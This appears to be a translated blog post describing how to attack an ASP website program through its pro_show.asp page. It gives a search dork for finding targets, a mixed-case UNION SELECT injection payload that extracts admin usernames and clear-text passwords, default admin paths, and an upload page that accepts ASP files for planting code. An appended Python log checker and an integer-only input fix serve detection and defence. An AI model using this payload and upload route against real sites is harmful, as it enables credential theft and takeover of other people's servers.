Keywords: inurl:pro_show.asp?showid=
The program uses version 1.0 (ASP) of the Maple Leaf general anti-injection filter, which is completely useless against this injection. The affected page in this type of website program is pro_show.asp.
It is vulnerable to cookie injection or variant injection. Before injecting, the number of fields can be determined with: ORDER BY XX
Injection statement: and 1=1 UNiOn SElEcT 1,username,3,4,5,6,7,8,9,10,password,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 From Lei_admin
The number of fields varies and has to be judged case by case.
The password is in clear text. Default admin back-end address: Admin/index/login.asp (it may also have been changed)
Back-end upload page: admin/inc/upfile.htm, which accepts ASP files directly
Upload path: admin/upimg/
Some back ends have two file upload vulnerabilities: admin/inc/upfiletwo.asp
Some back ends also include the eWebEditor editor.
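An added example, not from the original post: a Python check over IIS W3C log lines that flags the traces described above, namely a showid value that is not a plain integer in the query string or the cookie header, and script files requested from admin/upimg/. The log field order, the sample lines and the function names are assumptions made for this example.

```python
import re
from urllib.parse import unquote_plus

# Assumed W3C field order; cookie logging (cs(Cookie)) must be enabled in IIS.
FIELDS = ["date", "time", "method", "stem", "query", "ip", "cookie", "status"]

# Constructed sample lines using documentation IP ranges, not real traffic.
SAMPLE_LOG = """\
2013-08-10 10:00:01 GET /pro_show.asp showid=12 198.51.100.7 ASPSESSIONIDAA=XYZ 200
2013-08-10 10:00:07 GET /pro_show.asp showid=12+order+by+28 203.0.113.9 - 200
2013-08-10 10:00:09 GET /pro_show.asp - 203.0.113.9 showid=12+and+1=1+UNiOn+SElEcT+1,2;+ASPSESSIONIDAA=XYZ 200
2013-08-10 10:02:30 GET /admin/upimg/2013081001.asp - 203.0.113.9 - 200
2013-08-10 10:03:00 GET /admin/upimg/logo.jpg - 198.51.100.7 - 200
"""

INTEGER = re.compile(r"\d{1,10}")
UPLOADED_SCRIPT = re.compile(r"/admin/upimg/.+\.(asp|asa|cer)", re.I)


def param(raw, name, sep):
    """Return the decoded value of `name` from a query string or cookie field."""
    if raw == "-":
        return None
    for pair in raw.split(sep):
        key, _, value = pair.strip("+ ").partition("=")
        if key.lower() == name:
            return unquote_plus(value)
    return None


def findings(log_text):
    """Return a list of (client_ip, reason) for suspicious requests."""
    out = []
    for line in log_text.splitlines():
        parts = line.split(" ")
        if line.startswith("#") or len(parts) != len(FIELDS):
            continue
        rec = dict(zip(FIELDS, parts))
        stem = rec["stem"].lower()
        if stem.endswith("/pro_show.asp"):
            for source, sep in (("query", "&"), ("cookie", ";")):
                value = param(rec[source], "showid", sep)
                if value is None:
                    continue
                # Allow-list test: mixed-case keywords need no special handling.
                if not INTEGER.fullmatch(value):
                    out.append((rec["ip"], f"non-numeric showid in {source}"))
                elif source == "cookie":
                    out.append((rec["ip"], "showid supplied in cookie"))
        elif UPLOADED_SCRIPT.fullmatch(stem):
            out.append((rec["ip"], "script requested from upload directory"))
    return out
```

The same integer-only rule belongs in pro_show.asp itself, applied to the value regardless of whether it arrives in the URL or in a cookie.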
This article is from the "No Mark" blog; please be sure to keep this source: http://hucwuhen.blog.51cto.com/6253667/1269470